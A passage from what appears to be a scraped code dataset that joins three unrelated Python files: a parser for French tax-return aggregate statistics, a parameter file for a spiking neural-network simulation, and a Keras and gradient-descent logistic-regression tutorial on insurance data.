constant entre 96 et 2001 et égal à son\n # niveau de 2003\n # TODO: virer 2012 à 2014 ?\n revenus_fonciers = dict(\n name = 'revenus_foncier',\n sheetname = '2042-montant',\n skiprows = 222,\n parse_cols = 'A:H',\n slice_start = 1,\n slice_end = 20,\n prefix = 'f3',\n )\n\n contribution_revenus_locatifs = dict(\n name = 'contribution_revenus_locatifs',\n sheetname = '2042-montant',\n skiprows = 246,\n parse_cols = 'A:C',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f4',\n )\n\n # 5- Revenus exceptionnels ou différés\n\n revenus_exceptionnels = dict(\n name = 'revenus_exceptionnels',\n sheetname = '2042-montant',\n skiprows = 268,\n parse_cols = 'A:B',\n slice_start = 1,\n slice_end = 19,\n prefix = 'f5',\n )\n\n # 6- Charges déductibles et imputations diverses\n\n charges_deductibles = dict(\n name = 'charges_deductibles',\n sheetname = '2042-montant',\n skiprows = 316,\n parse_cols = 'A:I',\n slice_start = 1,\n slice_end = 19,\n prefix = 'f6',\n )\n\n epargne_retraite = dict(\n name = 'epargne_retraite',\n sheetname = '2042-montant',\n skiprows = 338,\n parse_cols = 'A:O',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f6',\n )\n\n # 7- Charges ouvrant droit à réduction ou à crédit d'impôt\n\n reductions_credits_impot = dict(\n name = 'reductions_credits_impot',\n sheetname = '2042-montant',\n skiprows = 360,\n parse_cols = 'A:BH',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f7',\n )\n\n # 8- Autres imputations, reprises de réductions d'impôt, conventions internationales, divers\n\n autres_imputations = dict(\n name = 'autres_imputations',\n sheetname = '2042-montant',\n skiprows = 383,\n parse_cols = 'A:L',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f7',\n )\n\n # Fiche complémentaire\n\n # 1- Gains de levée d'options\n\n options = dict(\n name = 'options',\n sheetname = '2042C - montant',\n skiprows = 5,\n parse_cols = 'A:I',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f1',\n )\n\n name, df = parse_bloc(**options)\n df.dtypes\n df.year\n\n # salaires exonérés\n\n salaires_exoneres = dict(\n name = 'salaires_exoneres',\n sheetname = '2042C - montant',\n skiprows = 26,\n parse_cols = 'A:I',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f1',\n )\n\n # crédit d'impôt mobilité\n # TODO; nothing in agrégats IPP\n\n # 3- 
Plus-values et gains divers\n\n plus_values_complementaire = dict(\n name = 'plus_values_complementaire',\n sheetname = '2042C - montant',\n skiprows = 67,\n parse_cols = 'A:T',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f3',\n )\n\n # 4- Revenus fonciers\n\n revenus_fonciers_complementaire = dict(\n name = 'revenus_fonciers_complementaire',\n sheetname = '2042C - montant',\n skiprows = 88,\n parse_cols = 'A:B',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f4',\n )\n\n # 5- Revenus et plus-values des professions non salariées\n\n prime_emploi_complementaire = dict(\n name = 'prime_emploi_complementaire',\n sheetname = '2042C - montant',\n skiprows = 111,\n parse_cols = 'A:G',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n\n revenus_agricoles_forfait = dict(\n name = 'revenus_agricoles_forfait',\n sheetname = '2042C - montant',\n skiprows = 167,\n parse_cols = 'A:Q',\n slice_start = 0,\n slice_end = 18,\n prefix = 'f5',\n )\n\n revenus_agricoles_reel = dict(\n name = 'revenus_agricoles_reel',\n sheetname = '2042C - montant',\n skiprows = 190,\n parse_cols = 'A:Y',\n slice_start = 0,\n slice_end = 18,\n prefix = 'f5',\n )\n\n revenus_agricoles_deficits = dict(\n name = 'revenus_agricoles_deficits',\n sheetname = '2042C - montant',\n skiprows = 212,\n parse_cols = 'A:M',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f5',\n )\n # TODO: *Avant 2007, les cases HE, IE, JE étaient séparé en deux (cases HE et HK,…,JE et JK) en fonction de\n # l'appartenance ou non à un CGA\n\n # Revenus industriels et commerciaux professionnels\n\n bic_pro_micro_entreprise = dict(\n name = 'bic_pro_micro_entreprise',\n sheetname = '2042C - montant',\n skiprows = 237,\n parse_cols = 'A:U',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n\n bic_pro_reel = dict(\n name = 'bic_pro_reel',\n sheetname = '2042C - montant',\n skiprows = 282,\n parse_cols = 'A:AE',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n # TODO\n # Pour les revenus de 1997, il n'y a pas de distinction entre les BIC professionnels et les BIC non professionnels.\n # On choisit de mettre les \"BIC exonérés\" dans cette case (et de ne rien mettre dans la case NB associée aux BIC\n # non professionnels exonérés).\n\n bic_pro_cga = dict(\n name = 'bic_pro_cga',\n sheetname = '2042C - montant',\n skiprows = 304,\n parse_cols = 'A:G',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n\n bic_non_pro_micro_entreprise = dict(\n name = 'bic_non_pro_micro_entreprise',\n sheetname = '2042C - montant',\n skiprows = 328,\n parse_cols = 'A:T',\n slice_start = 0,\n slice_end = 18,\n prefix = 'f5',\n )\n\n bic_non_pro_reel = dict(\n name = 'bic_non_pro_reel',\n sheetname = '2042C - montant',\n skiprows = 351,\n parse_cols = 'A:AH',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n # Pour l'année 1997, on dispose d'un montant agrégé pour les BIC non professionneles et les BNC non professionnels,\n # sans distinction non plus du régime d'imposition (simplifié, réel). Pour cette année, on met le montant agrégé\n # dans la case NC pour les revenus et dans la case NF pour les déficits. 
Il s'agit des cases relatives aux BIC non\n # professionnels imposés au régime réel.\n\n bic_non_pro_deficit_anterieur = dict(\n name = 'bic_non_pro_deficit_anterieur',\n sheetname = '2042C - montant',\n skiprows = 373,\n parse_cols = 'A:G',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n\n # Revenus non commerciaux professionnels\n\n bnc_pro_micro_vous = dict(\n name = 'bnc_pro_micro_vous',\n sheetname = '2042C - montant',\n skiprows = 396,\n parse_cols = 'A:P',\n slice_start = 0,\n slice_end = 18,\n prefix = 'f5',\n )\n # *Avant 2007, la cases QD était séparé en deux (cases QD et QJ) en fonction de l'appartenance ou non à un AA\n\n bnc_pro_micro_conj = dict(\n name = 'bnc_pro_micro_conj',\n sheetname = '2042C - montant',\n skiprows = 417,\n parse_cols = 'A:O',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n # *Avant 2007, la cases RD était séparé en deux (cases RD et RJ) en fonction de l'appartenance ou non à un AA\n\n bnc_pro_micro_pac = dict(\n name = 'bnc_pro_micro_pac',\n sheetname = '2042C - montant',\n skiprows = 437,\n parse_cols = 'A:N',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n # *Avant 2007, la cases SD était séparé en deux (cases SD et SJ) en fonction de l'appartenance ou non à un AA\n\n # Revenus non commerciaux non professionnels\n bnc_non_pro_vous = dict(\n name = 'bnc_non_pro_vous',\n sheetname = '2042C - montant',\n skiprows = 482,\n parse_cols = 'A:T',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f5',\n )\n # * Avant 2006, l'ensemble des variables de JG à MT ne concerne plus seulement le contribuable mais l'ensemble du\n # foyer. Les cases JK à SW et LK à SX sont donc supprimées.\n\n bnc_non_pro_conj = dict(\n name = 'bnc_non_pro_conj',\n sheetname = '2042C - montant',\n skiprows = 502,\n parse_cols = 'A:M',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f5',\n )\n\n bnc_non_pro_pac = dict(\n name = 'bnc_non_pro_pac',\n sheetname = '2042C - montant',\n skiprows = 521,\n parse_cols = 'A:M',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f5',\n )\n\n # Revenus accessoires\n # TODO\n\n # Revenus a imposer aux prelevements sociaux\n\n revenus_prelevements_sociaux = dict(\n name = 'revenus_prelevements_sociaux',\n sheetname = '2042C - montant',\n skiprows = 567,\n parse_cols = 'A:I',\n slice_start = 0,\n prefix = 'f5',\n slice_end = 17,\n )\n\n # 6- Charges et imputations diverses = charges à déduire du revenu\n\n charges_imputations_diverses = dict(\n name = 'charges_imputations_diverses',\n sheetname = '2042C - montant',\n skiprows = 587,\n parse_cols = 'A:R',\n slice_start = 2,\n prefix = 'f5',\n slice_end = 19,\n )\n # 3 Cette case EH (investissemencompte épargne co-developpement) n'a rien à voir avec la case EH colonne O\n # (investissement DOM-TOM)\n # 4 : Cette case était dans la déclaration 2042 avant 2007 (case somme à ajouter au revenu imposable)\n\n # 7- Charges ouvrant droit à réduction ou à crédit d'impôt\n\n reductions_credits_impot_complementaire = dict(\n name = 'reductions_credits_impot_complementaire',\n sheetname = '2042C - montant',\n skiprows = 613,\n parse_cols = 'A:BA',\n slice_start = 2,\n prefix = 'f5',\n slice_end = 20,\n )\n # 3 : les données brutes sont abérrantes pour l'année 2007, on vait par exemple 113 863 3, il manque donc deux zéros\n # derrères le 3. 
Et pour UA et UJ, j'ai rajouté 3 zéros derrières les nombres brutes pour avoir le bon rapport de\n # grandeur.\n # * UI = Total réduction d'impôt Outre-mer Avant 2008 : la déclaration détaille les composantes des Ivt Outremer par\n # secteur d'activité\n\n # 8- Autres imputations, conventions internationales, crédits d'impôt entreprise\n autres_imputations_complementaire = dict(\n name = 'autres_imputations_complementaire',\n sheetname = '2042C - montant',\n skiprows = 639,\n parse_cols = 'A:Z',\n slice_start = 1,\n prefix = 'f5',\n slice_end = 20,\n )\n\n # name, df = parse_bloc(**autres_imputations_complementaire)\n # print df.dtypes\n # df.year\n\n # 8- Autres imputations, conventions internationales, crédits d'impôt entreprise\n\n blocs = [\n traitements_salaires,\n prime_emploi,\n pension_retraite,\n rentes_viageres_titre_onereux,\n prelevement_forfaitaire_liberatoire,\n revenus_avec_abattement,\n revenus_sans_abattement,\n autres_revenus_financiers,\n plus_values,\n revenus_fonciers,\n contribution_revenus_locatifs,\n revenus_exceptionnels,\n charges_deductibles,\n epargne_retraite,\n reductions_credits_impot,\n autres_imputations,\n options,\n salaires_exoneres,\n plus_values_complementaire,\n revenus_fonciers_complementaire,\n prime_emploi_complementaire,\n revenus_agricoles_forfait,\n revenus_agricoles_reel,\n revenus_agricoles_deficits,\n bic_pro_micro_entreprise,\n bic_pro_reel,\n bic_pro_cga,\n bic_non_pro_micro_entreprise,\n bic_non_pro_reel,\n bic_non_pro_deficit_anterieur,\n bnc_pro_micro_vous,\n bnc_pro_micro_conj,\n bnc_pro_micro_pac,\n bnc_non_pro_vous,\n bnc_non_pro_conj,\n bnc_non_pro_pac,\n revenus_prelevements_sociaux,\n charges_imputations_diverses,\n reductions_credits_impot_complementaire,\n autres_imputations_complementaire\n ]\n\n data_frame_by_bloc_name = dict(parse_bloc(**bloc) for bloc in blocs)\n\n correct_errors(data_frame_by_bloc_name, show_only = False)\n\n ipp_denombrements = pandas.DataFrame()\n for data_frame in data_frame_by_bloc_name.values():\n ipp_denombrements = pandas.concat((\n ipp_denombrements,\n pandas.melt(data_frame, id_vars=['year'], var_name = 'code')\n ))\n ipp_denombrements.dropna(inplace = True)\n return ipp_denombrements\n\n\ndef correct_errors(data_frame_by_bloc_name, show_only = False):\n import re\n pattern = re.compile(\"^f[1-8][a-z][a-z]$\")\n note_pattern = re.compile(\"^f[1-8][a-z][a-z][1-4]$\")\n\n corrected_columns = set()\n problematic_columns = set()\n for bloc_name, data_frame in data_frame_by_bloc_name.items():\n\n correct_name_by_wrong_name = dict()\n drop_columns = list()\n\n for column in data_frame.columns:\n if column == 'year':\n assert numpy.issubdtype(data_frame[column].dtype, numpy.integer)\n assert data_frame[column].isin(range(1990, 2015)).all()\n continue\n if not pattern.match(column):\n # print '- ' + str(column)\n # remove trailing spaces\n problematic_columns.add(column)\n if column != column.strip():\n correct_name_by_wrong_name[column] = column.strip()\n # remove *\n if column.endswith('*') and pattern.match(column[:-1]):\n correct_name_by_wrong_name[column] = column[:-1]\n # remove unnamed\n if \"unnamed\" in column or \"-\" in column or 'total' in column:\n drop_columns.append(column)\n # remove trailing 1, 2, 3, 4 (notes in excel file)\n if note_pattern.match(column):\n correct_name_by_wrong_name[column] = column[:-1]\n\n corrected_columns = corrected_columns.union(set(correct_name_by_wrong_name.keys()))\n corrected_columns = corrected_columns.union(set(drop_columns))\n\n if not show_only:\n 
data_frame.drop(labels = drop_columns, axis = 1, inplace = True)\n data_frame.rename(columns = correct_name_by_wrong_name, inplace = True)\n\n print('Remaining problematic columns')\n print(problematic_columns.difference(corrected_columns))\n\n\ndef parse_openfisca_denombrements():\n openfisca_denombrements = pandas.read_excel(os.path.join(xls_directory, '2042_national.xls'), sheetname = 'montant')\n assert openfisca_denombrements.dtypes.apply(lambda x: numpy.issubdtype(x, numpy.float)).all(), \\\n openfisca_denombrements.dtypes\n openfisca_denombrements = openfisca_denombrements.stack().reset_index()\n openfisca_denombrements.rename(columns = {'level_0': 'code', 'level_1': 'year', 0: 'value'}, inplace = True)\n openfisca_denombrements[['year']] = openfisca_denombrements[['year']].astype(int)\n return openfisca_denombrements\n\n\ndef parse_dgfip_denombrements(years = None):\n\n assert years is not None\n assert min(years) >= 2001\n assert max(years) <= 2013\n\n dgfip_directory = os.path.join(xls_directory, 'D2042Nat')\n files = os.listdir(dgfip_directory)\n result = pandas.DataFrame()\n\n for year in years:\n file_regex = re.compile(\"^R20{}\".format(str(year)[2:4]))\n for filename in files:\n if file_regex.match(filename):\n log.info(\"Using file {} for year {}\".format(filename, year))\n break\n\n print(year)\n\n if year in [2001, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013]:\n dgfip_denombrements = pandas.read_excel(os.path.join(dgfip_directory, filename))\n if year == 2003:\n dgfip_denombrements = pandas.read_excel(os.path.join(dgfip_directory, filename), skiprows = 4)\n\n if year in [2001, 2003]:\n regex = re.compile(\"^[0-9][A-Z]{2}\")\n dgfip_denombrements.code.fillna(\"\", inplace = True)\n dgfip_denombrements = dgfip_denombrements.set_index('code').filter(regex = regex, axis = 0)\n new_variable_name_by_old = dict(\n (x, \"f{}\".format(x.lower())) for x in dgfip_denombrements.index)\n dgfip_denombrements = dgfip_denombrements.rename(index = new_variable_name_by_old)\n dgfip_denombrements['year'] = year\n dgfip_denombrements.rename(columns = {'montant': 'value', 'Nombre': 'nombre'}, inplace = True)\n del dgfip_denombrements['nombre']\n\n # TODO:\n if year in [2005, 2006, 2007, 2008]:\n # continue\n regex = re.compile(\"[A-Z]{2}\")\n\n dgfip_denombrements = dgfip_denombrements.set_index('nom').filter(regex = regex, axis = 0)\n dgfip_denombrements.index.name = 'code'\n new_variable_name_by_old = dict(\n (x, \"f{}\".format(x.lower())) for x in dgfip_denombrements.index)\n dgfip_denombrements = dgfip_denombrements.rename(index = new_variable_name_by_old)\n print(dgfip_denombrements)\n boum\n # trouver un moyen de renommer les codes pour qu'il y ait le numéro des sections\n\n# dgfip_denombrements.rename(columns = {'nom': 'code'}, inplace = True)\n# for ind in dgfip_denombrements.index:\n# if re.match(\"[A-Z][I, J, K, O, P, Q, S, V, W, X]\", dgfip_denombrements.ix[ind]['code']):\n# print dgfip_denombrements.ix[ind]['code']\n# dgfip_denombrements.rename(\n# {dgfip_denombrements.ix[ind]['code']: \"1{}\".format(dgfip_denombrements.ix[ind]['code'])}) # ,inplace = True\n#\n# or\n# dgfip_denombrements = dgfip_denombrements.filter(items = ['nom'], regex = regex)\n#\n# dgfip_denombrements['code'] = dgfip_denombrements['nom']\n# for ind in dgfip_denombrements.index:\n# if re.match(\"[A-Z][I, J, K, O, P, Q, S, V, W, X]\", dgfip_denombrements.ix[ind]['nom']):\n# print dgfip_denombrements.ix[ind]['nom']\n# dgfip_denombrements.ix[ind]['code'] = 
\"1{}\".format(dgfip_denombrements.ix[ind]['nom'])\n#\n# dgfip_denombrements = dgfip_denombrements.set_index('code').filter(regex = regex, axis = 0)\n\n if year == 2004:\n regex = re.compile(\"^Z[0-9][A-Z]{2}\")\n dgfip_denombrements.case.fillna(\"\", inplace = True)\n dgfip_denombrements.drop_duplicates(['case'], inplace = True)\n dgfip_denombrements = dgfip_denombrements.set_index('case').filter(regex = regex, axis = 0)\n dgfip_denombrements.index.name = 'code'\n new_variable_name_by_old = dict(\n (x, \"f{}\".format(x[1:].lower())) for x in dgfip_denombrements.index)\n dgfip_denombrements = dgfip_denombrements.rename(index = new_variable_name_by_old)\n dgfip_denombrements.reset_index(inplace = True)\n\n dgfip_denombrements['year'] = year\n dgfip_denombrements.rename(columns = {'Montant': 'value'}, inplace = True)\n del dgfip_denombrements['Nombre'], dgfip_denombrements[u'libellé'], dgfip_denombrements['nom']\n\n if year in [2009, 2010, 2011, 2012]:\n regex = re.compile(\"^Z[0-9][A-Z]{2}\")\n dgfip_denombrements = dgfip_denombrements.set_index('nom').filter(regex = regex, axis = 0)\n dgfip_denombrements.index.name = 'code'\n new_variable_name_by_old = dict(\n (x, \"f{}\".format(x[1:].lower())) for x in dgfip_denombrements.index)\n dgfip_denombrements = dgfip_denombrements.rename(index = new_variable_name_by_old)\n dgfip_denombrements.reset_index(inplace = True)\n dgfip_denombrements['year'] = year\n\n if year == 2009:\n dgfip_denombrements.rename(columns = {'Montants': 'value', 'Nombre': 'nombre'}, inplace = True)\n else:\n dgfip_denombrements.rename(columns = {'montants': 'value'}, inplace = True)\n\n del dgfip_denombrements['maximal'], dgfip_denombrements['nombre']\n\n if year == 2013:\n regex = re.compile(\"^Z[0-9][A-Z]{2}\")\n dgfip_denombrements = dgfip_denombrements.set_index('nom').filter(regex = regex, axis = 0)\n dgfip_denombrements.index.name = 'code'\n new_variable_name_by_old = dict(\n (x, \"f{}\".format(x[1:].lower())) for x in dgfip_denombrements.index)\n dgfip_denombrements = dgfip_denombrements.rename(index = new_variable_name_by_old)\n dgfip_denombrements.reset_index(inplace = True)\n dgfip_denombrements['year'] = year\n dgfip_denombrements.rename(columns = {'ano': 'value'}, inplace = True)\n del dgfip_denombrements['pas_ano']\n\n result = pandas.concat((result, dgfip_denombrements))\n result.dropna(subset = ['value'], inplace = True) # dropping NA's\n\n return result.loc[result.value != 0].copy() # excluding 0 values\n\n\ndef create_denombrements_fiscaux_data_frame(year = None, years = None, overwrite = False):\n \"\"\"\n Generates the table with all the data from Dénombrements Fiscaux .\n\n Parameters\n ----------\n year : int\n year of DGFIP data (coincides with year of declaration)\n years : list of integers\n list of years of interest. 
Optional.\n\n Example\n --------\n >>> table_2013 = denombrements_fiscaux_df_generator(year = 2013)\n\n Returns the main table of dénombrements fiscaux for the year 2013.\n \"\"\"\n if year is not None and years is None:\n years = [year]\n\n log.info('Parsing dénombrements fiscaux raw data for the following years: {}'.format(years))\n # Data coming for openfisca xls file\n openfisca_denombrements = parse_openfisca_denombrements()\n openfisca_denombrements['origin'] = 'OF'\n\n # Data coming from IPP\n ipp_denombrements = parse_ipp_denombrements()\n ipp_denombrements['origin'] = 'IPP'\n\n df = pandas.concat([ipp_denombrements, openfisca_denombrements])\n # Drop real duplicates\n df = df.drop_duplicates(subset = ['year', 'code', 'value'])\n df = df.reset_index(drop=True)\n\n # Problematic duplicates\n dups = df.duplicated(['year', 'code']) | df.duplicated(['year', 'code'], keep = 'last')\n z = df.loc[dups].copy()\n # sum of two columns in IPP for year < 2007\n wrong_before_2007 = ['f5ne', 'f5oe', 'f5rd', 'f5ke', 'f5le', 'f5he', 'f5ie', 'f5qd']\n df = df.loc[~(df.code.isin(wrong_before_2007) & (df.year < 2007))]\n log.info('Remaining roblematic duplicates when merging IPP and OF \\n {}'.format(\n z.loc[~(z.code.isin(wrong_before_2007) & (z.year < 2007))]\n ))\n df = df.loc[df.year.isin(years)].copy() if years is not None else df.copy()\n\n # Data coming from DGFiP\n dgfip_denombrements = parse_dgfip_denombrements(years)\n dgfip_denombrements['origin'] = 'DGFiP'\n df2 = pandas.concat([dgfip_denombrements, df])\n\n # Drop real duplicates\n df2 = df2.drop_duplicates(subset = ['year', 'code', 'value'])\n df2 = df2.reset_index(drop=True)\n\n dups2 = df2.duplicated(['year', 'code']) | df2.duplicated(['year', 'code'], keep = 'last')\n errors = df2.loc[dups2].copy()\n\n wrong_codes = ['f5ne', 'f5oe', 'f5rd', 'f5ke', 'f5le', 'f4tq', 'f5hd',\n 'f5id', 'f5he', 'f5ie', 'f5qd', 'f3ve', 'f3vf', 'f3ve', 'f3vf', 'f7tf', 'f7tf', 'f2gr', 'f2ch', 'f2bg', 'f6el',\n 'f6st', 'f2bg', 'f7cd', 'f2gr', 'f2ch', 'f7cd', 'f6st', 'f6el']\n wrong_years = [2006, 2005, 2004, 2003]\n log.info('Remaining problematic duplicates when merging with DGFiP data \\n {}'.format(\n errors.loc[~(errors.code.isin(wrong_codes) | errors.year.isin(wrong_years))]\n ))\n df2 = df2.loc[~(df2.code.isin(wrong_codes) | (df2.year.isin(wrong_years)))]\n result = df2.loc[df2.year.isin(years)].copy() if years is not None else df2.copy()\n\n log.info('For now, we keep only DGFiP data')\n result = dgfip_denombrements.copy() # TODO: recoupement avec data OpenFisca & IPP\n\n if overwrite:\n save_df_to_hdf(result, 'denombrements_fiscaux.h5', 'montants')\n\n return result, errors\n\n\ndef build_section_code():\n openfisca_denombrements = parse_openfisca_denombrements()\n ipp_denombrements = parse_ipp_denombrements()\n df = pandas.concat([openfisca_denombrements.code, openfisca_denombrements.code])\n return df.unique()\n\n\ndef get_denombrements_fiscaux_data_frame(year = None, years = None, rebuild = False, overwrite = False,\n fill_value = numpy.nan):\n if year is not None and years is None:\n years = [year]\n if rebuild:\n return create_denombrements_fiscaux_data_frame(years = years, overwrite = overwrite)\n else:\n data_frame = import_from_hdf('denombrements_fiscaux.h5', 'montants')\n return data_frame.loc[data_frame.year.isin(years)].copy()\n\n\ndef save_df_to_hdf(df, hdf_filename, key):\n file_path = os.path.join(hdf_directory, hdf_filename)\n df.to_hdf(file_path, key)\n\n\ndef import_from_hdf(hdf_filename, key):\n file_path = 
os.path.join(hdf_directory, hdf_filename)\n store = pandas.HDFStore(file_path)\n df = store[key]\n return df\n\n\nif __name__ == '__main__':\n build_section_code()\n dgfip = parse_dgfip_denombrements(years = range(2008, 2009))\n print(dgfip)\n# denomb_fisc_all, errors = create_denombrements_fiscaux_data_frame(\n# years = range(2009, 2014),\n# overwrite = True,\n# )\n","repo_name":"taxipp/ipp-macro-series-parser","sub_path":"ipp_macro_series_parser/denombrements_fiscaux/denombrements_parsers.py","file_name":"denombrements_parsers.py","file_ext":"py","file_size_in_byte":29920,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18293690599","text":"import sys\nimport numpy as np\nimport cupy as cp\nif sys.version_info >= (3,):\n xrange = range\n\n\nis_gpu = True\n\nif is_gpu is True:\n mat = cp\nelse:\n mat = np\n\nnonspiking_mode = True # whether to run in non-spiking mode (real-valued outputs)\n\nuse_rand_phase_lengths = True # use random phase lengths (chosen from Wald distribution)\nuse_rand_plateau_times = False # randomly sample the time of each neuron's apical plateau potential\nuse_conductances = True # use conductances between dendrites and soma\nuse_broadcast = True # use broadcast (ie. feedback to all layers comes from output layer)\nuse_spiking_feedback = True # use spiking feedback\nuse_spiking_feedforward = True # use spiking feedforward input\n\nuse_symmetric_weights = False # enforce symmetric weights\nnoisy_symmetric_weights = False # add noise to symmetric weights\n\nuse_sparse_feedback = False # use sparse feedback weights\nupdate_feedback_weights = False # update feedback weights\nuse_backprop = False # use error backpropagation\nuse_apical_conductance = False # use attenuated conductance from apical dendrite to soma\nuse_weight_optimization = True # attempt to optimize initial weights\nuse_feedback_bias = False # use biases in feedback paths\ninitial_test = False # whether to do an initial test on the test set prior to training\n\nrecord_backprop_angle = False # record angle b/w hidden layer error signals and backprop-generated error signals\nrecord_loss = True # record final layer loss during training\nrecord_training_error = True # record training error during training\nrecord_training_labels = True # record labels of images that were shown during training\nrecord_phase_times = False # record phase transition times across training\nrecord_plateau_times = False # record plateau potential times for each neuron across training\nrecord_voltages = False # record voltages of neurons during training (huge arrays for long simulations!)\n\n# --- Jacobian testing --- #\nrecord_eigvals = False # record maximum eigenvalues for Jacobians\nrecord_matrices = False # record Jacobian product & weight product matrices (huge arrays for long simulations!)\nplot_eigvals = False # dynamically plot maximum eigenvalues for Jacobians\n\ndefault_simulations_folder = 'Simulations/' # folder in which to save simulations (edit accordingly)\nweight_cmap = 'bone' # color map to use for weight plotting\n\ndt = 1.0 # time step (ms)\nmem = int(10/dt) # spike memory (time steps) - used to limit PSP integration of past spikes (for performance)\n\nl_f_phase = int(50/dt) # length of forward phase (time steps)\nl_t_phase = int(50/dt) # length of target phase (time steps)\nl_f_phase_test = int(250/dt) # length of forward phase for tests (time steps)\n\nintegration_time = l_f_phase - int(30/dt) # time steps of integration of neuronal variables used for 
plasticity\nintegration_time_test = l_f_phase_test - int(30/dt) # time steps of integration of neuronal variables during testing\n\nlambda_max = 0.2*dt # maximum spike rate (spikes per time step)\n\n# kernel parameters\ntau_s = 3.0 # synaptic time constant\ntau_l = 10.0 # leak time constant\n\n# conductance parameters\ng_b = 0.6 # basal conductance\ng_a = 0.05 if use_apical_conductance else 0 # apical conductance\n\ng_l = 1.0/tau_l # leak conductance\ng_d = g_b # dendritic conductance in output layer\n\nE_E = 8 # excitation reversal potential\nE_I = -8 # inhibition reversal potential\n\n# steady state constants\nk_B = g_b/(g_l + g_b + g_a)\nk_D = g_d/(g_l + g_d)\nk_I = 1.0/(g_l + g_d)\n\n# weight update constants\nP_hidden = 20.0/lambda_max # hidden layer error signal scaling factor\nP_final = 20.0/(lambda_max**2) # final layer error signal scaling factor\n\ndef kappa(x):\n return (mat.exp(-x/tau_l) - mat.exp(-x/tau_s))/(tau_l - tau_s)\n\ndef get_kappas(n):\n return mat.array([kappa(i+1) for i in xrange(n)])\n\n# initialize kappas array\nkappas = mat.flipud(get_kappas(mem))[:, mat.newaxis] \n\nn_full_test = 10000 # number of examples to use for full tests (every epoch)\nn_quick_test = 100 # number of examples to use for quick tests (every 1000 examples)\n\nif nonspiking_mode:\n print(\"******** mode: nonspiking ********\")\n\n # parameters for non-spiking mode\n use_rand_phase_lengths = False\n use_rand_plateau_times = False\n use_conductances = False\n use_spiking_feedforward = False\n use_spiking_feedback = False\n record_phase_times = False\n record_plateau_times = False\n record_voltages = False\n\n l_f_phase = 2\n l_t_phase = 2\n l_f_phase_test = 2\n integration_time = 1\n integration_time_test = 1\n mem = 1\n\nif use_rand_phase_lengths:\n # minimum phase lengths\n min_l_f_phase = l_f_phase\n min_l_t_phase = l_t_phase","repo_name":"quackson/ML_HW","sub_path":"params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":5042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17929639554","text":"import numpy as np \nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n# Importing the dataset\ndf = pd.read_csv(\"insurance_data.csv\")\n\nX_train, X_test, Y_train, Y_test = train_test_split(df[['age','affordibility']], df['bought_insurance'], test_size=0.2)\n\n# Scale the data\nX_train_scaled = X_train.copy()\nX_train_scaled['age'] = X_train_scaled['age']/100\n\nX_test_scaled = X_test.copy()\nX_test_scaled['age'] = X_test_scaled['age']/100\n\n# Build the model\nmodel = tf.keras.Sequential([\n tf.keras.layers.Dense(1, input_shape=(2,), activation='sigmoid', kernel_initializer='ones', bias_initializer='zeros')\n])\n\n# Compile the model\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n# Train the model\nmodel.fit(X_train_scaled, Y_train, epochs=5000)\n\n# Evaluate the model\nprint(model.evaluate(X_test_scaled, Y_test))\n\n# Predict the model\nprint(model.predict(X_test_scaled))\n\n# Plot the model\nplt.scatter(X_test_scaled['age'], Y_test, color='red')\nplt.show()\nplt.scatter(X_test_scaled['age'], [1 if x>=0.5 else 0 for x in model.predict(X_test_scaled)], color='blue')\nplt.show()\n\ndef log_loss(y_true, y_predicted):\n epsilon = 1e-15\n y_predicted_new = [max(i, epsilon) for i in y_predicted]\n y_predicted_new = [min(i, 1-epsilon) for i in y_predicted_new]\n y_predicted_new = np.array(y_predicted_new)\n 
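# the two clamp comprehensions above keep every prediction strictly inside\n    # (epsilon, 1 - epsilon) so np.log never receives 0 or 1; an equivalent\n    # vectorised form (editor's sketch, not in the original) would be:\n    #   y_predicted_new = np.clip(np.array(y_predicted), epsilon, 1 - epsilon)\n    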
return -np.mean(y_true*np.log(y_predicted_new)+ (1-y_true)*np.log(1-y_predicted_new))\n\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n\ndef gradient_descent(age,affordability,Y_true,epochs,loss_threshold):\n w1 = w2 = 1\n bias = 0\n rate = 0.5\n n = len(age)\n for i in range(epochs):\n weighted_sum = w1*age + w2*affordability + bias\n Y_predicted = sigmoid(weighted_sum)\n loss = log_loss(Y_true,Y_predicted)\n w1d = (1/n)*np.dot(np.transpose(age),(Y_predicted-Y_true))\n w2d = (1/n)*np.dot(np.transpose(affordability),(Y_predicted-Y_true))\n bias_d = np.mean(Y_predicted-Y_true)\n w1 = w1 - rate*w1d\n w2 = w2 - rate*w2d\n bias = bias - rate*bias_d\n print(f'Epoch:{i}, w1:{w1}, w2:{w2}, bias:{bias}, loss:{loss}')\n if loss<=loss_threshold:\n break\n return w1,w2,bias\n\nprint(gradient_descent(X_train_scaled['age'],X_train_scaled['affordibility'],Y_train,10000,0.4631))\n","repo_name":"akshat12000/Data-Science-Run-And-Learn-Series","sub_path":"Deep Learning/Gradient Descent/Gradient Descent.py","file_name":"Gradient 